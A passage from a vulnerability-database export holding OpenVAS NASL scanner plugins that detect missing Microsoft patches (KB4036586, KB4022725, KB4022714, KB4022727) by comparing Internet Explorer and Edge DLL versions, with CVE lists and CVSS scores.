if(version_is_less(version:sllVer, test_version:\"6.2.9200.16384\"))\n {\n report = 'File checked: ' + iePath + \"\\Sqmapi.dll\" + '\\n' +\n 'File version: ' + sllVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.16384\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0 && iedllVer)\n{\n if(version_in_range(version:iedllVer, test_version:\"11.0\", test_version2:\"11.0.9600.18697\"))\n {\n Vulnerable_range = \"11.0 - 11.0.9600.18697\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:08", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4036586.", "cvss3": {}, "published": "2017-09-13T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4036586)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8741", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811760", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4036586)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811760\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8529\", \"CVE-2017-8733\", \"CVE-2017-8736\", \"CVE-2017-8741\",\n \"CVE-2017-8747\", \"CVE-2017-8748\", \"CVE-2017-8749\", \"CVE-2017-8750\");\n script_bugtraq_id(100737, 98953, 100764, 100743, 100766, 100770, 100771, 100765);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 16:28:36 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4036586)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4036586.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft scripting engines do not properly handle objects in memory.\n\n - Internet Explorer improperly handles specific HTML content.\n\n - An error in Microsoft browsers due to improper parent domain verification\n in certain functionality.\n\n - An error in the way that Microsoft browser JavaScript engines render content\n when handling objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft browser JavaScript engines render content\n when handling objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain access to\n potentially sensitive information, spoof content or serve as a pivot and detect\n specific files on the user's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x, 10.x and 11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4036586\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|1[01])\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21046\"))\n {\n Vulnerable_range = \"Less than 9.0.8112.21046\";\n VULN = TRUE ;\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22248\"))\n {\n Vulnerable_range = \"Less than 10.0.9200.22248\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18792\"))\n {\n Vulnerable_range = \"Less than 11.0.9600.18792\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:45:28", "description": "This host is missing a critical security\n update according to Microsoft KB4022725", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811167", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022725)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811167\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-8474\", \"CVE-2017-8524\", \"CVE-2017-8527\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-0282\",\n \"CVE-2017-0283\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8531\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8555\", \"CVE-2017-0292\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0296\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\",\n \"CVE-2017-8491\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8492\",\n \"CVE-2017-8493\", \"CVE-2017-8498\", \"CVE-2017-8499\", \"CVE-2017-8504\",\n \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8520\", \"CVE-2017-8521\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8464\", \"CVE-2017-8465\", \"CVE-2017-8515\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98902, 98930, 98933, 98853, 98903, 98953, 98863, 98885, 98920,\n 98854, 98845, 98819, 98820, 98914, 98856, 98857, 98821, 98824,\n 98922, 98923, 98862, 98858, 98826, 98932, 98954, 98955, 98929,\n 98835, 98859, 98847, 98956, 98836, 98837, 98904, 98860, 98865,\n 98839, 98840, 98867, 98869, 98884, 98901, 98870, 98850, 98886,\n 98883, 98892, 98887, 98900, 98848, 98849, 98925, 98926, 98928,\n 98818, 98843, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:30:05 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The error with slow firewall operations that sometimes results in\n timeouts of Surface Hub's cleanup operation.\n\n - An issue with a race condition that prevents Cortana cross-device\n notification reply from working. Users will not be able to use the\n remote toast activation feature set.\n\n - An issue with the Privacy Separator feature of a Wireless Access Point\n does not block communication between wireless devices on local subnets.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n gain the same user rights as the current user and to take control of\n an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1703 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.412\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.412\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:43", "description": "This host is missing a critical security\n update according to Microsoft KB4022714", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022714)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022714)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811164\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0216\", \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\",\n \"CVE-2017-8475\", \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\",\n \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\", \"CVE-2017-8548\",\n \"CVE-2017-8549\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8515\", \"CVE-2017-8517\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98896, 98897, 98898, 98885, 98853,\n 98903, 98854, 98953, 98863, 98819, 98920, 98918, 98845, 98856,\n 98820, 98821, 98914, 98922, 98857, 98862, 98824, 98923, 98929,\n 98858, 98859, 98826, 98932, 98954, 98955, 98835, 98836, 98847,\n 98860, 98837, 98839, 98865, 98867, 98840, 98884, 98869, 98870,\n 98901, 98887, 98850, 98855, 98900, 98818, 98848, 98849, 98926,\n 98928, 98930, 98843, 98844, 98846, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:02:48 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists in,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - The certutil.exe can no longer generate an export file (.epf) when attempting\n to recover a key for a version 1 certificate.\n\n - Additional issues with updated time zone information, updates to the\n Access Point Name (APN) database and Internet Explorer. Security updates to\n Microsoft Scripting Engine, Microsoft Edge, Windows COM, Windows kernel, Windows\n kernel-mode drivers, Microsoft Uniscribe, Microsoft Graphics Component, Windows\n Shell, Microsoft Windows PDF and Internet Explorer. For more information about\n the security vulnerabilities resolved, please refer to the Security Update Guide.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n execute arbitrary code in the context of the current user, gain the same user\n rights as the current user, to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.961\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.961\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:01", "description": "This host is missing a critical security\n update according to Microsoft KB4022727", "cvss3": {}, "published": "2017-06-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022727)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811196", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022727)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811196\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\",\n \"CVE-2017-8547\", \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8492\", \"CVE-2017-8493\",\n \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\", \"CVE-2017-8524\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98897, 98898, 98885, 98853, 98903,\n 98953, 98863, 98819, 98920, 98918, 98854, 98845, 98820, 98914,\n 98856, 98857, 98821, 98824, 98922, 98923, 98862, 98858, 98859,\n 98826, 98932, 98954, 98955, 98929, 98835, 98836, 98847, 98860,\n 98837, 98839, 98865, 98840, 98867, 98869, 98884, 98901, 98887,\n 98870, 98850, 98855, 98900, 98818, 98848, 98849, 98926, 98928,\n 98930, 98843, 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-15 16:09:05 +0530 (Thu, 15 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection (DIBSection) function.\n\n - Displays turn off unexpectedly even when 'Turn off display' is set to 'Never' in\n Power Options.\n\n - certutil.exe can no longer generate an export file (.epf) when attempting to\n recover a key for a version 1 certificate.\n\n - MSI files will no longer install when Device Guard is enabled.\n\n - A thin client becomes unusable and unresponsive when Unified Write Filter\n (UWF) with DISK mode is enabled causing NTFS errors with ID: 55 & ID: 130\n to be logged in the Event Logs.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then\n install programs. View, change, or delete data, or create new accounts with full\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for 32bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n 